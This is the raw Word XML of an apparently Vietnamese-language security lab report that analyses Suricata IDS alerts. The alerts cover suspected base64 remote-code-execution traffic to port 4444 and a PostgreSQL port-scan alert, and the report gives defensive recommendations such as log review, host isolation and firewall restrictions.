        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Phân tích lại gói tin (nếu có pcap) để xác nhận payload cụ thể.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323569F1" w14:textId="6E91260A" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:lastRenderedPageBreak/>
        <w:t>Kiểm tra hệ thống đích 192.168.100.</w:t>
      </w:r>
      <w:r w:rsidR="00F9157C">
        <w:t>105</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> có dịch vụ nào đang mở cổng 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462E1BF1" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Đối chiếu log hệ điều hành và ứng dụng để phát hiện dấu hiệu thực thi mã bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71F2BAC6" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Nếu xác định là tấn công, tiến hành cô lập máy đích và thu thập bằng chứng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F4300D" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Thiết lập chính sách firewall để chặn truy cập không hợp lệ đến cổng 4444 nếu không dùng đến.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE40869" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Tăng cường phát hiện hành vi RCE qua base64 thông qua các luật IDS bổ sung hoặc hệ thống EDR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAC7DB5" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00F9157C">
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mô tả sự kiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5F521C" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Hệ thống IDS Suricata ghi nhận một kết nối TCP đến cổng 5432, thường dùng bởi PostgreSQL, với cảnh báo “ET SCAN Suspicious inbound to PostgreSQL port 5432”. Gói tin duy nhất trong flow cho thấy một kết nối thử nghiệm (scan) không phản hồi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDDCF58" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signature:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> ET SCAN Suspicious inbound to PostgreSQL port 5432</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24682E46" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Category:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> Potentially Bad Traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC3FBF6" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A5DF9D" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Action:</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> allowed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E805C4E" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00F9157C">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK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847"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w14:paraId="313A8A7F" w14:textId="77777777" w:rsidTr="00E45A0B">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2D62071C" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E45A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Thuộc tính</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24B790CB" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E45A0B">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Giá trị</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w14:paraId="7BB2F984" w14:textId="77777777" w:rsidTr="00E45A0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DE0004E" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Tactic</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="057885D5" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Reconnaissance (TA0043)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w14:paraId="2B074CE8" w14:textId="77777777" w:rsidTr="00E45A0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1C1B458D" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Technique</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5D47EACB" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Scanning IP Blocks (T1595)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w14:paraId="500B0FED" w14:textId="77777777" w:rsidTr="00E45A0B">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="521E2DFB" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Confidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6AD6DDE2" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
            <w:r w:rsidRPr="00E45A0B">
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="536ED56E" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đánh giá</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DFED119" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Kết nối đến cổng cơ sở dữ liệu nội bộ thể hiện hành vi quét cổng (port scan) để tìm dịch vụ PostgreSQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A89AC1" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Không có dữ liệu phản hồi từ server, cho thấy đây có thể là bước đầu của reconnaissance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46459C74" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Đề xuất</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778FECC6" w14:textId="0798B8BE" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Xác minh xem IP 192.168.100.</w:t>
      </w:r>
      <w:r w:rsidR="00F9157C">
        <w:t>104</w:t>
      </w:r>
      <w:r w:rsidRPr="00E45A0B">
        <w:t xml:space="preserve"> có thuộc hệ thống quản trị hay không.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677B5194" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:lastRenderedPageBreak/>
        <w:t>Rà soát log PostgreSQL để phát hiện kết nối thất bại hoặc bất thường.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F5791B" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Cấu hình firewall giới hạn truy cập cổng 5432 chỉ cho các IP được phép.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6433A838" w14:textId="77777777" w:rsidR="00E45A0B" w:rsidRPr="00E45A0B" w:rsidRDefault="00E45A0B" w:rsidP="00E45A0B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E45A0B">
        <w:t>Bổ sung luật IDS để phát hiện quét cổng khác (scan đa cổng, scan nhanh).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2C4CCA" w14:textId="2CC95B04" w:rsidR="002218AE" w:rsidRDefault="002218AE"/>
    <w:sectPr w:rsidR="00221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D48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7224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71831"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="68B4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958F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3E1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00B0E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7E8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0400"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2C9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B72CF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A01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21781"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4E698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D2CCC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D30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C2E3B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9598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E01C4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CAD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77C98"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4850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0626CB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F1B66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2F541F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CEA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E5992"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="068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C4AEF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="003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00982"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="CC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A68AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="60646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61CF4"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E44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231D2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FEFA5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064CA6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E20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B27DB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="75A25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0630AD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2182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A26BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5F9AF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1C748C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D1B2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821F31"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C56C7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1A5370"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="73CE3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B12EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1778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D11ABF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F8EA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F36D2A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="63E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B1469"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7632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B6FB9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A2342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19103D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="591A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BF01EB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A4F8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E35D76"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6BE0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43443E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="97A0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89650">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1201017647">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1619526474">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="2144227424">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1115557101">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1607422720">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1690373283">
    <w:abstractNumId w:val="33"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="591546693">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1495561836">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="361366863">
    <w:abstractNumId w:val="32"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="32312847">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1024285152">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="748385708">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="1874609597">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="1409156094">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="1332637275">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="2062173941">
    <w:abstractNumId w:val="34"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="146289111">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1972393736">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1867911268">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="1752503662">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="1220358053">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="460392012">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1089932199">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="1635016471">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="748309732">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="987050392">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="1022705588">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="1680542577">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="1394354235">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="500656861">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="1027439983">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="33" w16cid:durableId="1299533346">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="34" w16cid:durableId="436801808">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="35" w16cid:durableId="19438305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A0B"/>
    <w:rsid w:val="00040AA7"/>
    <w:rsid w:val="002218AE"/>
    <w:rsid w:val="00223B07"/>
    <w:rsid w:val="002C02EE"/>
    <w:rsid w:val="002D6E2F"/>
    <w:rsid w:val="0043446B"/>
    <w:rsid w:val="004F3931"/>
    <w:rsid w:val="00592E18"/>
    <w:rsid w:val="006239D7"/>
    <w:rsid w:val="006D0165"/>
    <w:rsid w:val="006E3C5E"/>
    <w:rsid w:val="006F1EEC"/>
    <w:rsid w:val="007103E0"/>
    <w:rsid w:val="007B31F2"/>
    <w:rsid w:val="008176AB"/>
    <w:rsid w:val="008713DD"/>
    <w:rsid w:val="008D171E"/>
    <w:rsid w:val="00B608B4"/>
    <w:rsid w:val="00B75185"/>
    <w:rsid w:val="00BC38D9"/>
    <w:rsid w:val="00C207EE"/>
    <w:rsid w:val="00CA2425"/>
    <w:rsid w:val="00CC467F"/>
    <w:rsid w:val="00E15B94"/>
    <w:rsid w:val="00E45A0B"/>
    <w:rsid w:val="00E735A3"/>
    <w:rsid w:val="00F51FA4"/>
    <w:rsid w:val="00F91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4E5E6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FCBC44CB-2E8A-4736-AD21-C1F577532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A0B"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:color w:val="272727" w:themeColor="text1" w:themeTint="D8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:uiPriority w:val="10"/>
    <w:qFormat/>
    <w:rsid w:val="00E45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A0B"/>
    <w:pPr>
      <w:spacing w:before="160"/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="QuoteChar">
    <w:name w:val="Quote Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Quote"/>
    <w:uiPriority w:val="29"/>
    <w:rsid w:val="00E45A0B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="404040" w:themeColor="text1" w:themeTint="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00E45A0B"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseEmphasis">
    <w:name w:val="Intense Emphasis"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="21"/>
    <w:qFormat/>
    <w:rsid w:val="00E45A0B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="IntenseQuote">
    <w:name w:val="Intense Quote"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="IntenseQuoteChar"/>
    <w:uiPriority w:val="30"/>
    <w:qFormat/>
    <w:rsid w:val="00E45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A0B"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="IntenseReference">
    <w:name w:val="Intense Reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="32"/>
    <w:qFormat/>
    <w:rsid w:val="00E45A0B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:smallCaps/>
      <w:color w:val="0F4761" w:themeColor="accent1" w:themeShade="BF"/>
      <w:spacing w:val="5"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E45A0B"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E45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76393">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="33469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0xrajneesh/90-days-security-challenge/blob/main/Challenge%231/Lab"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dimage.kali.org/kali-2025.1a/kali-linux-2025.1a-vmware-amd64.7z" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://releases.ubuntu.com/jammy/ubuntu-22.04.5-live-server-amd64.iso"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10</Pages>
  <Words>991</Words>
  <Characters>5654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Quân</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Lê Minh Quân</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-10T05:40:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-22T16:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>